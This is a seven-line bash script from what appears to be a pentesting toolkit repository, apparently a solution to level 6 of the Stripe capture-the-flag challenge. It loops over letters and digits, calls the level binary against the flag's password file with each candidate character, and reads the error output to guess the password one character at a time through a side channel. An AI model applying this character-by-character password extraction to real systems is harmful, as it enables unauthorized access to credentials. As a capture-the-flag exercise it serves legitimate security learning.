sec-pentesting-toolkit/CTFs_and_WarGames/STRIPE_1-2-3/1/timming_attack.sh
2014-11-29 22:16:26 -05:00

7 lines
No EOL
141 B
Bash

#!/bin/bash
for c in {A..Z} {a..z} {0..9}; do
echo $c
head -c35 file & sleep 0.1
/levels/level06 /home/the-flag/.password "$c"A 2> file
done